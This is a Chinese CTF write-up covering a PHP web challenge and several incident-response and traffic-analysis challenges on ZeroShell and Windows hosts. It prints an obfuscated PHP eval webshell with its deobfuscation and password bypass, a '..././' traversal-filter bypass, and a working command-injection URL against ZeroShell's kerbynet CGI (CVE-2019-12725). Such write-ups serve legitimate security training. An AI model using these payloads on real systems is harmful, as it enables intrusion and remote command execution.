web

hello_web

打开源码有两个提示

“

../hackme.php

../tips.php

伪协议绕过，php://，data，被waf了，../目录穿越不被解析，双写绕过?file=..././tips.php，是一个探针，看另一个php

<?php
highlight_file(__FILE__);
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
?>

解混淆，echo出变量值

根据eval写出反混淆代码

<?php
highlight_file(__FILE__);

//$OxirhK = "strtr"
//$YpAUWC = "substr"
//$rVkKjU = "52"
//$YwzIst = "64_decode"

$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";
/*eval('?>'.$YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU))));*/


$a = base64_decode(strtr(substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==", 104), substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==", 52, 52), substr("eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==", 0, 52)));
echo $a;
?>

一句话，密码是cmd_66.99，有下划线，PHP碰到无法解析的符号才会解析成下划线，用[进行代替，密码就是cmd[66.99

find / -name flag没找到，在run/log目录下找到

威胁检测与网络流量分析

虽然学过应急，但还是好多没做出，所以把赛题保存下以后有时间继续研究

环境：

“

这是初赛的部分虚拟机赛题，需提前下载，VMware Workstation推荐的版本为17以上。 提前下载的4个加密大附件，解压密码在开赛后通过比赛平台置顶公告告知。 82f13fdc9f7078ba29c4a6dcc65d8859.7z 文件大小：14.8g 下载链接1：https://pan.baidu.com/s/1hHX8J13EWRAfm3e-qakuDw 提取码：GAME 下载链接2：https://drive.google.com/file/d/14RBdzdozTHIwJs_tveivjwOqclcp2rhL/view

38c44f100028b56e09dc48522385fa95.7z 文件大小：11.3g 下载链接1：https://pan.baidu.com/s/1ca436rOpVL5PpEG015S9dA 提取码：GAME 下载链接2：https://drive.google.com/file/d/1iYAopn58-MU6L-BtqHzDAcZAEPvfZeD4/view

2e9c01da1d333cb8840968689ed3bc57.7z 文件大小：270.1m 下载链接1：https://pan.baidu.com/s/1N58ui-5Ll4Zk7Ys4SUGFvw 提取码：GAME 下载链接2：https://drive.google.com/file/d/19VKjCBaF_X2VvexHGwS__TRhnS39njVT/view

772d6da3c735b1ff574ab8c2f4863358.7z 文件大小：624.6m 下载链接1：https://pan.baidu.com/s/164bvpJZlFVRgXV7Ed_Olew 提取码：GAME 下载链接2：https://drive.google.com/file/d/1LVqf6bYNmnH7OFIxhTDlAWagswpUMtDC/view

此外，后续qq群管理员会在官方q群的群文件分享压缩分卷。

zeroshell_1

“

小路是一名实习生，接替公司前任网管的工作，一天发现公司网络出口出现了异常的通信，现需要通过回溯出口流量对异常点位(防火墙)进行定位，并确定异常的设备。然后进行深度取证检查（需要获取root权限）。现在需要你从网络攻击数据包中找出漏洞攻击的会话，分析会话编写exp或数据包重放获取防火墙设备管理员权限，查找防火墙设备上安装的木马，然后分析木马外联地址和通信密钥以及木马启动项位置。

“

（本题附件见于提前下载的加密附件2e9c01da1d333cb8840968689ed3bc57.7z，解压密码为11b0526b-9cfb-4ac4-8a75-10ad9097b7ce ）

“

从数据包中找出攻击者利用漏洞开展攻击的会话（攻击者执行了一条命令），写出该会话中设置的flag, 结果提交形式：flag{xxxxxxxxx}

使用工具对流量包数据进行提取，得到refer头关键信息

进行base64解码得到flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}

zeroshell_2

“

通过漏洞利用获取设备控制权限，然后查找设备上的flag文件，提取flag文件内容，结果提交形式：flag{xxxxxxxxxx}

根据文档打开环境，网上找payload去打

https://github.com/gougou123-hash/CVE-2019-12725/blob/main/CVE-2019-12725.py

化身脚本小子

flag{c6045425-6e6e-41d0-be09-95682a4f65c4}

zeroshell_3

“

找出受控机防火墙设备中驻留木马的外联域名或IP地址，结果提交形式：flag{xxxx}，如flag{www.abc.com} 或 flag{16.122.33.44}

就这一个发送SYN报文的可疑IP

flag{202.115.89.103}

zeroshell_4

“

请写出木马进程执行的本体文件的名称，结果提交形式：flag{xxxxx}，仅写文件名不加路径

应急的知识，做到这就觉得赛制改革很有意义

“

.so .c .sh .py后缀

crontab -l任务

/tmp临时目录

在临时目录就能看到隐藏的木马文件了

flag{.nginx}

zeroshell_5

“

请提取驻留的木马本体文件，通过逆向分析找出木马样本通信使用的加密密钥，结果提交形式：flag{xxxx}

网上的get形式payload，能够访问，wget下载

http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Acat /tmp/.nginx%0A%27

目前只会造简单的免杀马，还不会深度分析密钥，先留着吧

zeroshell_6

“

请写出驻留木马的启动项，注意写出启动文件的完整路径。结果提交形式：flag{xxxx}，如flag{/a/b/c}

尝试去ps看能不能在本地找到启动项，挨个去ls查看

最终在/var/register/system/目录找到启动项目

kali最近老是卡住页面，来回重启，还是用ssh连接工具去挨个搜索

在/var/register/system/startup/scripts/nat找打enable

flag{/var/register/system/startup/scripts/nat}

WinFT_1

“

某单位网管日常巡检中发现某员工电脑（IP：192.168.116.123）存在异常外连及数据传输行为，随后立即对该电脑进行断网处理，并启动网络安全应急预案进行排查。

“

（本题附件见于提前下载的加密附件82f13fdc9f7078ba29c4a6dcc65d8859.7z，解压密码为3604e2f3-585a-4972-a867-3a9cc8d34c1d ）

“

受控机木马的回连域名及ip及端口是（示例：flag{xxx.com:127.0.0.1:2333}）

打开工具1就能看到

flag{miscsecure.com:192.168.116.130:443}

WinFT_2

“

受控机启动项中隐藏flag是

base64后html解码

flag{AES_encryption_algorithm_is_an_excellent_encryption_algorithm}

WinFT_3

“

受控机中驻留的flag是

WinFT_4

“

受控源头隐藏的flag是

WinFT_5

“

分析流量，获得压缩包中得到答案

CTF-NetA提取压包，010分析第二个有信息，base64解码

得到flag{a1b2c3d4e5f67890abcdef1234567890-2f4d90a1b7c8e2349d3f56e0a9b01b8a-CBC}

WinFT_6

“

通过aes解密得到的flag

sc05_1

“

近日某公司网络管理员老张在对安全设备进行日常巡检过程中发现防火墙设备日志中产生了1条高危告警，告警IP为134.6.4.12（简称IP1），在监测到可疑网络活动后，老张立刻对磁盘和内存制做了镜像。为考校自己刚收的第一个徒弟李华，老张循序渐进，布置了5道问题。假如你是李华，请你根据提供的防火墙日志、磁盘镜像及内存镜像文件对主机开展网络安全检查分析，并根据5道问题提示，计算并提交相应flag。

“

（本题附件见于提前下载的加密附件38c44f100028b56e09dc48522385fa95.7z，解压密码为 37af3744-53eb-49fd-854a-f6f79bbf5b1c ）

“

问题1：IP1地址首次被请求时间是多久？计算内容如：2020/05/18_19:35:10 提交格式：flag{32位大写MD5值}

excel寻找，md5加密

flag{01DF5BC2388E287D4CC8F11EA4D31929}

sc05_2

“

IP1地址对应的小马程序MD5是多少？提交格式：flag{32位大写MD5值}

sc05_3

“

大马程序运行在哪个进程中？计算内容：PID-进程名，如123-cmd.exe 提交格式：flag{32位大写MD5值}

sc05_4

“

大马程序备用回连的域名是多少？计算内容如：www.baidu.com 提交格式：flag{32位大写MD5值}

sc05_5

“

攻击者最终窃取数据的文件中包含的flag值？ 提交格式：flag{xxx},注意大小FLAG{xx}要转换为小写flag{xx}

sc05_6

“

李华的电脑被植入了恶意程序，恶意程序发送了一个流量包，请你尝试根据截获的流量和病毒样本程序，获取Windows用户Lihua的登录密码。最终提交格式为为NTLM解密后的密码，格式为flag{password}

sxmisc

Kiwi

“

李华的电脑被植入了恶意程序，恶意程序发送了一个流量包，请你尝试根据截获的流量和病毒样本程序，获取Windows用户Lihua的登录密码。最终提交格式为为NTLM解密后的密码，格式为flag{password}